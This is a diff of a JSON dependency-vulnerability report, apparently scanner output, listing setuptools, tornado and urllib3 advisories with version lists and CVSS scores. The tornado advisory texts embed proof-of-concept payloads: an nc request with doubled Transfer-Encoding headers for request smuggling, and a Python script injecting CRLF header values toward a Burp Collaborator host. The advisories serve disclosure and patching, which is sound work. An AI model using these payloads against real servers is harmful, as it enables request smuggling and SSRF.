"24.3.1", - "25.0.0", - "25.0.1", - "25.0.2", - "25.1.0", - "25.1.1", - "25.1.2", - "25.1.3", - "25.1.4", - "25.1.5", - "25.1.6", - "25.2.0", - "25.3.0", - "25.4.0", - "26.0.0", - "26.1.0", - "26.1.1", - "27.0.0", - "27.1.0", - "27.1.2", - "27.2.0", - "27.3.0", - "27.3.1", - "28.0.0", - "28.1.0", - "28.2.0", - "28.3.0", - "28.4.0", - "28.5.0", - "28.6.0", - "28.6.1", - "28.7.0", - "28.7.1", - "28.8.0", - "28.8.1", - "29.0.0", - "29.0.1", - "3.0", - "3.0.1", - "3.0.2", - "3.1", - "3.2", - "3.3", - "3.4", - "3.4.1", - "3.4.2", - "3.4.3", - "3.4.4", - "3.5", - "3.5.1", - "3.5.2", - "3.6", - "3.7", - "3.7.1", - "3.8", - "3.8.1", - "30.0.0", - "30.1.0", - "30.2.0", - "30.2.1", - "30.3.0", - "30.4.0", - "31.0.0", - "31.0.1", - "32.0.0", - "32.1.0", - "32.1.1", - "32.1.2", - "32.1.3", - "32.2.0", - "32.3.0", - "32.3.1", - "33.1.0", - "33.1.1", - "34.0.0", - "34.0.1", - "34.0.2", - "34.0.3", - "34.1.0", - "34.1.1", - "34.2.0", - "34.3.0", - "34.3.1", - "34.3.2", - "34.3.3", - "34.4.0", - "34.4.1", - "35.0.0", - "35.0.1", - "35.0.2", - "36.0.1", - "36.1.0", - "36.1.1", - "36.2.0", - "36.2.1", - "36.2.2", - "36.2.3", - "36.2.4", - "36.2.5", - "36.2.6", - "36.2.7", - "36.3.0", - "36.4.0", - "36.5.0", - "36.6.0", - "36.6.1", - "36.7.0", - "36.7.1", - "36.7.2", - "36.8.0", - "37.0.0", - "38.0.0", - "38.1.0", - "38.2.0", - "38.2.1", - "38.2.3", - "38.2.4", - "38.2.5", - "38.3.0", - "38.4.0", - "38.4.1", - "38.5.0", - "38.5.1", - "38.5.2", - "38.6.0", - "38.6.1", - "38.7.0", - "39.0.0", - "39.0.1", - "39.1.0", - "39.2.0", - "4.0", - "4.0.1", - "40.0.0", - "40.1.0", - "40.1.1", - "40.2.0", - "40.3.0", - "40.4.0", - "40.4.1", - "40.4.2", - "40.4.3", - "40.5.0", - "40.6.0", - "40.6.1", - "40.6.2", - "40.6.3", - "40.7.0", - "40.7.1", - "40.7.2", - "40.7.3", - "40.8.0", - "40.9.0", - "41.0.0", - "41.0.1", - "41.1.0", - "41.2.0", - "41.3.0", - "41.4.0", - "41.5.0", - "41.5.1", - "41.6.0", - "42.0.0", - "42.0.1", - "42.0.2", - "43.0.0", - "44.0.0", - "44.1.0", - "44.1.1", - "45.0.0", - "45.1.0", - "45.2.0", - "45.3.0", - "46.0.0", - "46.1.0", - "46.1.1", - "46.1.2", - "46.1.3", - "46.2.0", - "46.3.0", - "46.3.1", - "46.4.0", - "47.0.0", - "47.1.0", - "47.1.1", - "47.2.0", - "47.3.0", - "47.3.1", - "47.3.2", - "48.0.0", - "49.0.0", - "49.0.1", - "49.1.0", - "49.1.1", - "49.1.2", - "49.1.3", - "49.2.0", - "49.2.1", - "49.3.0", - "49.3.1", - "49.3.2", - "49.4.0", - "49.5.0", - "49.6.0", - "5.0", - "5.0.1", - "5.0.2", - "5.1", - "5.2", - "5.3", - "5.4", - "5.4.1", - "5.4.2", - "5.5", - "5.5.1", - "5.6", - "5.7", - "5.8", - "50.0.0", - "50.0.1", - "50.0.2", - "50.0.3", - "50.1.0", - "50.2.0", - "50.3.0", - "50.3.1", - "50.3.2", - "51.0.0", - "51.1.0", - "51.1.0.post20201221", - "51.1.1", - "51.1.2", - "51.2.0", - "51.3.0", - "51.3.1", - "51.3.2", - "51.3.3", - "52.0.0", - "53.0.0", - "53.1.0", - "54.0.0", - "54.1.0", - "54.1.1", - "54.1.2", - "54.1.3", - "54.2.0", - "56.0.0", - "56.1.0", - "56.2.0", - "57.0.0", - "57.1.0", - "57.2.0", - "57.3.0", - "57.4.0", - "57.5.0", - "58.0.0", - "58.0.1", - "58.0.2", - "58.0.3", - "58.0.4", - "58.1.0", - "58.2.0", - "58.3.0", - "58.4.0", - "58.5.0", - "58.5.1", - "58.5.2", - "58.5.3", - "59.0.1", - "59.1.0", - "59.1.1", - "59.2.0", - "59.3.0", - "59.4.0", - "59.5.0", - "59.6.0", - "59.7.0", - "59.8.0", - "6.0.1", - "6.0.2", - "6.1", - "60.0.0", - "60.0.1", - "60.0.2", - "60.0.3", - "60.0.4", - "60.0.5", - "60.1.0", - "60.1.1", - "60.10.0", - "60.2.0", - "60.3.0", - "60.3.1", - "60.4.0", - "60.5.0", - "60.6.0", - "60.7.0", - "60.7.1", - "60.8.0", - "60.8.1", - "60.8.2", - "60.9.0", - "60.9.1", - "60.9.2", - "60.9.3", - "61.0.0", - "61.1.0", - "61.1.1", - "61.2.0", - "61.3.0", - "61.3.1", - "62.0.0", - "62.1.0", - "62.2.0", - "62.3.0", - "62.3.1", - "62.3.2", - "62.3.3", - "62.3.4", - "62.4.0", - "62.5.0", - "62.6.0", - "63.0.0", - "63.0.0b1", - "63.1.0", - "63.2.0", - "63.3.0", - "63.4.0", - "63.4.1", - "63.4.2", - "63.4.3", - "64.0.0", - "64.0.1", - "64.0.2", - "64.0.3", - "65.0.0", - "65.0.1", - "65.0.2", - "65.1.0", - "65.1.1", - "65.2.0", - "65.3.0", - "65.4.0", - "65.4.1", - "65.5.0", - "65.5.1", - "65.6.0", - "65.6.1", - "65.6.2", - "65.6.3", - "65.7.0", - "66.0.0", - "66.1.0", - "66.1.1", - "67.0.0", - "67.1.0", - "67.2.0", - "67.3.1", - "67.3.2", - "67.3.3", - "67.4.0", - "67.5.0", - "67.5.1", - "67.6.0", - "67.6.1", - "67.7.0", - "67.7.1", - "67.7.2", - "67.8.0", - "68.0.0", - "68.1.0", - "68.1.2", - "68.2.0", - "68.2.1", - "68.2.2", - "69.0.0", - "69.0.1", - "69.0.2", - "69.0.3", - "69.1.0", - "69.1.1", - "69.2.0", - "69.3.0", - "69.3.1", - "69.4.0", - "69.4.1", - "69.4.2", - "69.5.0", - "69.5.1", - "7.0", - "8.0", - "8.0.1", - "8.0.2", - "8.0.3", - "8.0.4", - "8.1", - "8.2", - "8.2.1", - "8.3", - "9.0", - "9.0.1", - "9.1" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-cx63-2mw6-8hw5/GHSA-cx63-2mw6-8hw5.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6345" - }, - { - "type": "WEB", - "url": "https://github.com/pypa/setuptools/pull/4332" - }, - { - "type": "WEB", - "url": "https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0" - }, - { - "type": "PACKAGE", - "url": "https://github.com/pypa/setuptools" - }, - { - "type": "WEB", - "url": "https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-94" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-07-15T16:25:38Z", - "nvd_published_at": "2024-07-15T01:15:01Z", - "severity": "HIGH" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-cx63-2mw6-8hw5" - ], - "aliases": [ - "BIT-setuptools-2024-6345", - "CVE-2024-6345", - "GHSA-cx63-2mw6-8hw5" - ], - "max_severity": "8.8" - } - ] - }, - { - "package": { - "name": "tornado", - "version": "6.4", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-06-06T21:46:24Z", - "published": "2024-06-06T21:41:20Z", - "schema_version": "1.6.0", - "id": "GHSA-753j-mpmx-qq6g", - "related": [ - "CGA-2mj6-w546-q9r6", - "CGA-72gj-8qx6-gcj4", - "CGA-gfgp-4jrg-x8xh", - "CGA-wq3q-35vc-xj9h" - ], - "summary": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in tornado", - "details": "### Summary\nWhen Tornado receives a request with two `Transfer-Encoding: chunked` headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. [Pound](https://en.wikipedia.org/wiki/Pound_(networking)) does this.\n\n### PoC\n0. Install Tornado.\n1. Start a simple Tornado server that echoes each received request's body:\n```bash\ncat << EOF > server.py\nimport asyncio\nimport tornado\n\nclass MainHandler(tornado.web.RequestHandler):\n def post(self):\n self.write(self.request.body)\n\nasync def main():\n tornado.web.Application([(r\"/\", MainHandler)]).listen(8000)\n await asyncio.Event().wait()\n\nasyncio.run(main())\nEOF\npython3 server.py &\n```\n2. Send a valid chunked request:\n```bash\nprintf 'POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nZ\\r\\n0\\r\\n\\r\\n' | nc localhost 8000\n```\n3. Observe that the response is as expected:\n```\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Sat, 07 Oct 2023 17:32:05 GMT\nContent-Length: 1\n\nZ\n```\n4. Send a request with two `Transfer-Encoding: chunked` headers:\n```\nprintf 'POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nZ\\r\\n0\\r\\n\\r\\n' | nc localhost 8000\n```\n5. Observe the strange response:\n```\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Sat, 07 Oct 2023 17:35:40 GMT\nContent-Length: 0\n\nHTTP/1.1 400 Bad Request\n\n```\nThis is because Tornado believes that the request has no message body, so it tries to interpret `1\\r\\nZ\\r\\n0\\r\\n\\r\\n` as its own request, which causes a 400 response. With a little cleverness involving `chunk-ext`s, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure.\n\n### Impact\nAnyone using Tornado behind a proxy that forwards requests containing multiple `Transfer-Encoding: chunked` headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.\n", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "tornado", - "purl": "pkg:pypi/tornado" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "6.4.1" - } - ] - } - ], - "versions": [ - "0.2", - "1.0", - "1.1", - "1.1.1", - "1.2", - "1.2.1", - "2.0", - "2.1", - "2.1.1", - "2.2", - "2.2.1", - "2.3", - "2.4", - "2.4.1", - "3.0", - "3.0.1", - "3.0.2", - "3.1", - "3.1.1", - "3.2", - "3.2.1", - "3.2.2", - "4.0", - "4.0.1", - "4.0.2", - "4.1", - "4.1b2", - "4.2", - "4.2.1", - "4.2b1", - "4.3", - "4.3b1", - "4.3b2", - "4.4", - "4.4.1", - "4.4.2", - "4.4.3", - "4.4b1", - "4.5", - "4.5.1", - "4.5.2", - "4.5.3", - "4.5b1", - "4.5b2", - "5.0", - "5.0.1", - "5.0.2", - "5.0a1", - "5.0b1", - "5.1", - "5.1.1", - "5.1b1", - "6.0", - "6.0.1", - "6.0.2", - "6.0.3", - "6.0.4", - "6.0a1", - "6.0b1", - "6.1", - "6.1b1", - "6.1b2", - "6.2", - "6.2b1", - "6.2b2", - "6.3", - "6.3.1", - "6.3.2", - "6.3.3", - "6.3b1", - "6.4", - "6.4b1" - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.4.0", - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-753j-mpmx-qq6g/GHSA-753j-mpmx-qq6g.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g" - }, - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572" - }, - { - "type": "PACKAGE", - "url": "https://github.com/tornadoweb/tornado" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-444" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-06-06T21:41:20Z", - "nvd_published_at": null, - "severity": "MODERATE" - } - }, - { - "modified": "2024-06-06T22:04:10Z", - "published": "2024-06-06T21:46:31Z", - "schema_version": "1.6.0", - "id": "GHSA-w235-7p84-xx57", - "related": [ - "CGA-3mg6-hjmp-vwjr", - "CGA-cj87-mmpg-46c2", - "CGA-fgf6-jq66-8gmr", - "CGA-jf2f-4wch-4c93" - ], - "summary": "Tornado has a CRLF injection in CurlAsyncHTTPClient headers", - "details": "### Summary\nTornado\u2019s `curl_httpclient.CurlAsyncHTTPClient` class is vulnerable to CRLF (carriage return/line feed) injection in the request headers.\n\n### Details\nWhen an HTTP request is sent using `CurlAsyncHTTPClient`, Tornado does not reject carriage return (\\r) or line feed (\\n) characters in the request headers. As a result, if an application includes an attacker-controlled header value in a request sent using `CurlAsyncHTTPClient`, the attacker can inject arbitrary headers into the request or cause the application to send arbitrary requests to the specified server.\n\nThis behavior differs from that of the standard `AsyncHTTPClient` class, which does reject CRLF characters.\n\nThis issue appears to stem from libcurl's (as well as pycurl's) lack of validation for the [`HTTPHEADER`](https://curl.se/libcurl/c/CURLOPT_HTTPHEADER.html) option. libcurl\u2019s documentation states:\n\n> The headers included in the linked list must not be CRLF-terminated, because libcurl adds CRLF after each header item itself. Failure to comply with this might result in strange behavior. libcurl passes on the verbatim strings you give it, without any filter or other safe guards. That includes white space and control characters.\n\npycurl similarly appears to assume that the headers adhere to the correct format. Therefore, without any validation on Tornado\u2019s part, header names and values are included verbatim in the request sent by `CurlAsyncHTTPClient`, including any control characters that have special meaning in HTTP semantics.\n\n### PoC\nThe issue can be reproduced using the following script:\n\n```python\nimport asyncio\n\nfrom tornado import httpclient\nfrom tornado import curl_httpclient\n\nasync def main():\n http_client = curl_httpclient.CurlAsyncHTTPClient()\n\n request = httpclient.HTTPRequest(\n # Burp Collaborator payload\n \"http://727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com/\",\n method=\"POST\",\n body=\"body\",\n # Injected header using CRLF characters\n headers={\"Foo\": \"Bar\\r\\nHeader: Injected\"}\n )\n\n response = await http_client.fetch(request)\n print(response.body)\n\n http_client.close()\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n```\n\nWhen the specified server receives the request, it contains the injected header (`Header: Injected`) on its own line:\n\n```http\nPOST / HTTP/1.1\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com\nUser-Agent: Mozilla/5.0 (compatible; pycurl)\nAccept: */*\nAccept-Encoding: gzip,deflate\nFoo: Bar\nHeader: Injected\nContent-Length: 4\nContent-Type: application/x-www-form-urlencoded\n\nbody\n```\n\nThe attacker can also construct entirely new requests using a payload with multiple CRLF sequences. For example, specifying a header value of `\\r\\n\\r\\nPOST /attacker-controlled-url HTTP/1.1\\r\\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com` results in the server receiving an additional, attacker-controlled request:\n\n```http\nPOST /attacker-controlled-url HTTP/1.1\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com\nContent-Length: 4\nContent-Type: application/x-www-form-urlencoded\n\nbody\n```\n\n### Impact\nApplications using the Tornado library to send HTTP requests with untrusted header data are affected. This issue may facilitate the exploitation of server-side request forgery (SSRF) vulnerabilities.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "tornado", - "purl": "pkg:pypi/tornado" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "6.4.1" - } - ] - } - ], - "versions": [ - "0.2", - "1.0", - "1.1", - "1.1.1", - "1.2", - "1.2.1", - "2.0", - "2.1", - "2.1.1", - "2.2", - "2.2.1", - "2.3", - "2.4", - "2.4.1", + "20.0", + "20.1", + "20.1.1", + "20.10.1", + "20.2.2", + "20.3", + "20.3.1", + "20.4", + "20.6.6", + "20.6.7", + "20.6.8", + "20.7.0", + "20.8.0", + "20.8.1", + "20.9.0", + "21.0.0", + "21.1.0", + "21.2.0", + "21.2.1", + "21.2.2", + "22.0.0", + "22.0.1", + "22.0.2", + "22.0.4", + "22.0.5", + "23.0.0", + "23.1.0", + "23.2.0", + "23.2.1", + "24.0.0", + "24.0.1", + "24.0.2", + "24.0.3", + "24.1.0", + "24.1.1", + "24.2.0", + "24.2.1", + "24.3.0", + "24.3.1", + "25.0.0", + "25.0.1", + "25.0.2", + "25.1.0", + "25.1.1", + "25.1.2", + "25.1.3", + "25.1.4", + "25.1.5", + "25.1.6", + "25.2.0", + "25.3.0", + "25.4.0", + "26.0.0", + "26.1.0", + "26.1.1", + "27.0.0", + "27.1.0", + "27.1.2", + "27.2.0", + "27.3.0", + "27.3.1", + "28.0.0", + "28.1.0", + "28.2.0", + "28.3.0", + "28.4.0", + "28.5.0", + "28.6.0", + "28.6.1", + "28.7.0", + "28.7.1", + "28.8.0", + "28.8.1", + "29.0.0", + "29.0.1", "3.0", "3.0.1", "3.0.2", "3.1", - "3.1.1", "3.2", - "3.2.1", - "3.2.2", + "3.3", + "3.4", + "3.4.1", + "3.4.2", + "3.4.3", + "3.4.4", + "3.5", + "3.5.1", + "3.5.2", + "3.6", + "3.7", + "3.7.1", + "3.8", + "3.8.1", + "30.0.0", + "30.1.0", + "30.2.0", + "30.2.1", + "30.3.0", + "30.4.0", + "31.0.0", + "31.0.1", + "32.0.0", + "32.1.0", + "32.1.1", + "32.1.2", + "32.1.3", + "32.2.0", + "32.3.0", + "32.3.1", + "33.1.0", + "33.1.1", + "34.0.0", + "34.0.1", + "34.0.2", + "34.0.3", + "34.1.0", + "34.1.1", + "34.2.0", + "34.3.0", + "34.3.1", + "34.3.2", + "34.3.3", + "34.4.0", + "34.4.1", + "35.0.0", + "35.0.1", + "35.0.2", + "36.0.1", + "36.1.0", + "36.1.1", + "36.2.0", + "36.2.1", + "36.2.2", + "36.2.3", + "36.2.4", + "36.2.5", + "36.2.6", + "36.2.7", + "36.3.0", + "36.4.0", + "36.5.0", + "36.6.0", + "36.6.1", + "36.7.0", + "36.7.1", + "36.7.2", + "36.8.0", + "37.0.0", + "38.0.0", + "38.1.0", + "38.2.0", + "38.2.1", + "38.2.3", + "38.2.4", + "38.2.5", + "38.3.0", + "38.4.0", + "38.4.1", + "38.5.0", + "38.5.1", + "38.5.2", + "38.6.0", + "38.6.1", + "38.7.0", + "39.0.0", + "39.0.1", + "39.1.0", + "39.2.0", "4.0", "4.0.1", - "4.0.2", - "4.1", - "4.1b2", - "4.2", - "4.2.1", - "4.2b1", - "4.3", - "4.3b1", - "4.3b2", - "4.4", - "4.4.1", - "4.4.2", - "4.4.3", - "4.4b1", - "4.5", - "4.5.1", - "4.5.2", - "4.5.3", - "4.5b1", - "4.5b2", + "40.0.0", + "40.1.0", + "40.1.1", + "40.2.0", + "40.3.0", + "40.4.0", + "40.4.1", + "40.4.2", + "40.4.3", + "40.5.0", + "40.6.0", + "40.6.1", + "40.6.2", + "40.6.3", + "40.7.0", + "40.7.1", + "40.7.2", + "40.7.3", + "40.8.0", + "40.9.0", + "41.0.0", + "41.0.1", + "41.1.0", + "41.2.0", + "41.3.0", + "41.4.0", + "41.5.0", + "41.5.1", + "41.6.0", + "42.0.0", + "42.0.1", + "42.0.2", + "43.0.0", + "44.0.0", + "44.1.0", + "44.1.1", + "45.0.0", + "45.1.0", + "45.2.0", + "45.3.0", + "46.0.0", + "46.1.0", + "46.1.1", + "46.1.2", + "46.1.3", + "46.2.0", + "46.3.0", + "46.3.1", + "46.4.0", + "47.0.0", + "47.1.0", + "47.1.1", + "47.2.0", + "47.3.0", + "47.3.1", + "47.3.2", + "48.0.0", + "49.0.0", + "49.0.1", + "49.1.0", + "49.1.1", + "49.1.2", + "49.1.3", + "49.2.0", + "49.2.1", + "49.3.0", + "49.3.1", + "49.3.2", + "49.4.0", + "49.5.0", + "49.6.0", "5.0", "5.0.1", "5.0.2", - "5.0a1", - "5.0b1", "5.1", - "5.1.1", - "5.1b1", - "6.0", + "5.2", + "5.3", + "5.4", + "5.4.1", + "5.4.2", + "5.5", + "5.5.1", + "5.6", + "5.7", + "5.8", + "50.0.0", + "50.0.1", + "50.0.2", + "50.0.3", + "50.1.0", + "50.2.0", + "50.3.0", + "50.3.1", + "50.3.2", + "51.0.0", + "51.1.0", + "51.1.0.post20201221", + "51.1.1", + "51.1.2", + "51.2.0", + "51.3.0", + "51.3.1", + "51.3.2", + "51.3.3", + "52.0.0", + "53.0.0", + "53.1.0", + "54.0.0", + "54.1.0", + "54.1.1", + "54.1.2", + "54.1.3", + "54.2.0", + "56.0.0", + "56.1.0", + "56.2.0", + "57.0.0", + "57.1.0", + "57.2.0", + "57.3.0", + "57.4.0", + "57.5.0", + "58.0.0", + "58.0.1", + "58.0.2", + "58.0.3", + "58.0.4", + "58.1.0", + "58.2.0", + "58.3.0", + "58.4.0", + "58.5.0", + "58.5.1", + "58.5.2", + "58.5.3", + "59.0.1", + "59.1.0", + "59.1.1", + "59.2.0", + "59.3.0", + "59.4.0", + "59.5.0", + "59.6.0", + "59.7.0", + "59.8.0", "6.0.1", "6.0.2", - "6.0.3", - "6.0.4", - "6.0a1", - "6.0b1", "6.1", - "6.1b1", - "6.1b2", - "6.2", - "6.2b1", - "6.2b2", - "6.3", - "6.3.1", - "6.3.2", - "6.3.3", - "6.3b1", - "6.4", - "6.4b1" + "60.0.0", + "60.0.1", + "60.0.2", + "60.0.3", + "60.0.4", + "60.0.5", + "60.1.0", + "60.1.1", + "60.10.0", + "60.2.0", + "60.3.0", + "60.3.1", + "60.4.0", + "60.5.0", + "60.6.0", + "60.7.0", + "60.7.1", + "60.8.0", + "60.8.1", + "60.8.2", + "60.9.0", + "60.9.1", + "60.9.2", + "60.9.3", + "61.0.0", + "61.1.0", + "61.1.1", + "61.2.0", + "61.3.0", + "61.3.1", + "62.0.0", + "62.1.0", + "62.2.0", + "62.3.0", + "62.3.1", + "62.3.2", + "62.3.3", + "62.3.4", + "62.4.0", + "62.5.0", + "62.6.0", + "63.0.0", + "63.0.0b1", + "63.1.0", + "63.2.0", + "63.3.0", + "63.4.0", + "63.4.1", + "63.4.2", + "63.4.3", + "64.0.0", + "64.0.1", + "64.0.2", + "64.0.3", + "65.0.0", + "65.0.1", + "65.0.2", + "65.1.0", + "65.1.1", + "65.2.0", + "65.3.0", + "65.4.0", + "65.4.1", + "65.5.0", + "65.5.1", + "65.6.0", + "65.6.1", + "65.6.2", + "65.6.3", + "65.7.0", + "66.0.0", + "66.1.0", + "66.1.1", + "67.0.0", + "67.1.0", + "67.2.0", + "67.3.1", + "67.3.2", + "67.3.3", + "67.4.0", + "67.5.0", + "67.5.1", + "67.6.0", + "67.6.1", + "67.7.0", + "67.7.1", + "67.7.2", + "67.8.0", + "68.0.0", + "68.1.0", + "68.1.2", + "68.2.0", + "68.2.1", + "68.2.2", + "69.0.0", + "69.0.1", + "69.0.2", + "69.0.3", + "69.1.0", + "69.1.1", + "69.2.0", + "69.3.0", + "69.3.1", + "69.4.0", + "69.4.1", + "69.4.2", + "69.5.0", + "69.5.1", + "7.0", + "8.0", + "8.0.1", + "8.0.2", + "8.0.3", + "8.0.4", + "8.1", + "8.2", + "8.2.1", + "8.3", + "9.0", + "9.0.1", + "9.1" ], "database_specific": { - "last_known_affected_version_range": "<= 6.4.0", - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-w235-7p84-xx57/GHSA-w235-7p84-xx57.json" + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-cx63-2mw6-8hw5/GHSA-cx63-2mw6-8hw5.json" } } ], "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-w235-7p84-xx57" - }, - { - "type": "WEB", - "url": "https://github.com/tornadoweb/tornado/commit/7786f09f84c9f3f2012c4cf3878417cb9f053669" - }, - { - "type": "PACKAGE", - "url": "https://github.com/tornadoweb/tornado" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-93" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-06-06T21:46:31Z", - "nvd_published_at": null, - "severity": "MODERATE" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-753j-mpmx-qq6g" - ], - "aliases": [ - "GHSA-753j-mpmx-qq6g" - ], - "max_severity": "5.3" - }, - { - "ids": [ - "GHSA-w235-7p84-xx57" - ], - "aliases": [ - "GHSA-w235-7p84-xx57" - ], - "max_severity": "6.5" - } - ] - }, - { - "package": { - "name": "urllib3", - "version": "2.2.1", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-07-15T22:12:28Z", - "published": "2024-06-17T21:37:20Z", - "schema_version": "1.6.0", - "id": "GHSA-34jh-p97f-mpxf", - "aliases": [ - "CVE-2024-37891" - ], - "related": [ - "CGA-2vvm-h2g8-jrwc", - "CGA-32mf-hm7c-cqmg", - "CGA-37xg-qrch-w8h8", - "CGA-3ggr-w55x-hf5j", - "CGA-5v3j-934q-gj4m", - "CGA-64rf-gm8h-pg8g", - "CGA-688x-4mm6-g5vm", - "CGA-69g4-mv22-46cq", - "CGA-8f64-fgpv-jxj2", - "CGA-8hq8-2689-rc8h", - "CGA-cx62-9vw2-mmpq", - "CGA-grjq-jh3q-2p7g", - "CGA-gwpm-7fhq-3wh2", - "CGA-h28r-8q2c-xq96", - "CGA-j235-35vq-wrm8", - "CGA-jqq5-p5w5-hr5j", - "CGA-m9q6-p3c8-wp58", - "CGA-mrr8-97mj-749q", - "CGA-rqhm-766h-p289", - "CGA-vgvj-86h2-mvw3", - "CGA-vwcx-7fqm-jggq", - "CGA-w3h9-h7jv-6q22" - ], - "summary": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects ", - "details": "When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected.\n\nHowever, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects.\n\nBecause this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident.\n\nUsers should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach.\n\n## Affected usages\n\nWe believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:\n\n* Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support.\n* Not disabling HTTP redirects.\n* Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin.\n\n## Remediation\n\n* Using the `Proxy-Authorization` header with urllib3's `ProxyManager`.\n* Disabling HTTP redirects using `redirects=False` when sending requests.\n* Not using the `Proxy-Authorization` header.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.26.19" - } - ] - } - ], - "versions": [ - "0.2", - "0.3", - "0.3.1", - "0.4.0", - "0.4.1", - "1.0", - "1.0.1", - "1.0.2", - "1.1", - "1.10", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.11", - "1.12", - "1.13", - "1.13.1", - "1.14", - "1.15", - "1.15.1", - "1.16", - "1.17", - "1.18", - "1.18.1", - "1.19", - "1.19.1", - "1.2", - "1.2.1", - "1.2.2", - "1.20", - "1.21", - "1.21.1", - "1.22", - "1.23", - "1.24", - "1.24.1", - "1.24.2", - "1.24.3", - "1.25", - "1.25.1", - "1.25.10", - "1.25.11", - "1.25.2", - "1.25.3", - "1.25.4", - "1.25.5", - "1.25.6", - "1.25.7", - "1.25.8", - "1.25.9", - "1.26.0", - "1.26.1", - "1.26.10", - "1.26.11", - "1.26.12", - "1.26.13", - "1.26.14", - "1.26.15", - "1.26.16", - "1.26.17", - "1.26.18", - "1.26.2", - "1.26.3", - "1.26.4", - "1.26.5", - "1.26.6", - "1.26.7", - "1.26.8", - "1.26.9", - "1.3", - "1.4", - "1.5", - "1.6", - "1.7", - "1.7.1", - "1.8", - "1.8.2", - "1.8.3", - "1.9", - "1.9.1" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-34jh-p97f-mpxf/GHSA-34jh-p97f-mpxf.json" - } + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "2.0.0" - }, - { - "fixed": "2.2.2" - } - ] - } - ], - "versions": [ - "2.0.0", - 